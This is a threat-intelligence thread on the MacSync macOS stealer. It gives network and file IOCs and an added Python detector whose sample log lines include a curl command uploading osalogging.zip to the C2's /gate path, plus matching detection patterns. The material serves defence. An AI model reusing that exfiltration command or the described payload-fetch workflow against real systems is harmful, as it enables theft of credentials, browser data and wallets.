Published: October 29, 2025

1/ Sometimes the best hunts start with a simple share. A few strings from an updated #MacSync #macOS malware, dropped casually by @g0njxa, led us to the FUD file, which appears to be a dropper 👇

@g0njxa 2/ The script reaches out to filebreef[.]com with hardcoded authentication tokens. It fetches an AppleScript payload and executes it via osascript. The stolen credentials, browser data, and wallet information get compressed into osalogging.zip and uploaded to the /gate path.

3/ But here's where it gets interesting: this sample isn't alone. We pivoted to the network indicators and checked what else is talking to the same infrastructure. The IP address reveals a disturbing pattern – 13 distinct malware samples, all uploaded within the last four days.

4/ Among those 13 communicating samples, we see a fake #TrezorSuite application as well; we already described how it works here 👉 https://x.com/moonlock_lab/sta...

5/ Then we checked our lab's telemetry: over the past 72 hours alone, we've identified 40+ unique MacSync samples. It becomes clear that the threat actor started using an automated workflow to generate samples at scale. A nice collection was prepared by @txhaflaire just a

IOC 🧙
[Network]
45.159.79[.]219 (AS 400992)
filebreef[.]com (main loader C2)
borkdeal[.]com (Trezor phishing)
[Files]
c3178905a95a5037110f65343378eb562221a8d7c5cbb986b9674609d33e59d6
0c10b41852c60aa55e5ee3338347be89233072c36852db18f900891c5e3fa714
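As an added example (not Moonlock Lab's code), the following script turns the IOC list above and the behaviour described in tweet 2 (osascript executing content fetched from the loader C2, then osalogging.zip being uploaded to /gate) into a small detection pass over endpoint log lines. The log format, the field names (proc=, args=, dst=, hash=) and the sample lines themselves are constructed for illustration; only the indicators and the osalogging.zip / /gate names come from the thread.

```python
from __future__ import annotations

import re
from typing import Iterable

# Indicators exactly as published in the thread, in their defanged form.
DEFANGED_IOCS = {
    "ip": ["45.159.79[.]219"],
    "domain": ["filebreef[.]com", "borkdeal[.]com"],
    "sha256": [
        "c3178905a95a5037110f65343378eb562221a8d7c5cbb986b9674609d33e59d6",
        "0c10b41852c60aa55e5ee3338347be89233072c36852db18f900891c5e3fa714",
    ],
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('[.]', 'hxxp') back into its matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOCS = {kind: [refang(v) for v in vals] for kind, vals in DEFANGED_IOCS.items()}

# Behavioural signals from tweet 2: osascript appearing in the same event as the
# loader C2, and the osalogging.zip archive being sent to the /gate path.
OSASCRIPT_RE = re.compile(r"\bosascript\b")
GATE_UPLOAD_RE = re.compile(r"osalogging\.zip.*?/gate|/gate.*?osalogging\.zip")


def scan_line(line: str) -> list[str]:
    """Return every IOC and behaviour match found in one log line."""
    hits: list[str] = []
    for kind, values in IOCS.items():
        for value in values:
            if value in line:
                hits.append(f"ioc:{kind}:{value}")
    if OSASCRIPT_RE.search(line) and any(d in line for d in IOCS["domain"]):
        hits.append("behaviour:osascript_from_c2")
    if GATE_UPLOAD_RE.search(line):
        hits.append("behaviour:gate_upload")
    return hits


def scan_log(lines: Iterable[str]) -> dict[int, list[str]]:
    """Map 1-based line numbers to their hits; lines with no hits are omitted."""
    return {i: hits for i, line in enumerate(lines, 1) if (hits := scan_line(line))}


# Constructed sample log (hypothetical format; not real telemetry).
SAMPLE_LOG = [
    "2025-10-28T10:01:02Z proc=curl args='-s https://filebreef.com/ -H Authorization:<token>'",
    "2025-10-28T10:01:03Z proc=osascript args='-e <fetched script>' parent=curl src=filebreef.com",
    "2025-10-28T10:02:10Z dst=45.159.79.219:443 proc=curl args='-F file=@/tmp/osalogging.zip https://filebreef.com/gate'",
    "2025-10-28T10:05:00Z proc=Safari dst=example.com",
    "2025-10-28T10:06:30Z event=file_written hash=c3178905a95a5037110f65343378eb562221a8d7c5cbb986b9674609d33e59d6",
]

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(hits)}")
```

The IOC matches on their own are only as good as the indicator list; the two behavioural checks are what keep the pass useful when the actor rotates samples at the rate described in tweet 5, because osascript launched from a fresh C2 fetch and an archive posted to /gate survive a change of file hashes.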

It's amazing to see our work come to life! At Moonlock Lab, we dig deep into macOS malware. Now, with the Moonlock app by @MacPaw, that deep technical insight is turning into real, easy-to-use security for everyone. We hope you feel safer! 🔒 https://moonlock.com
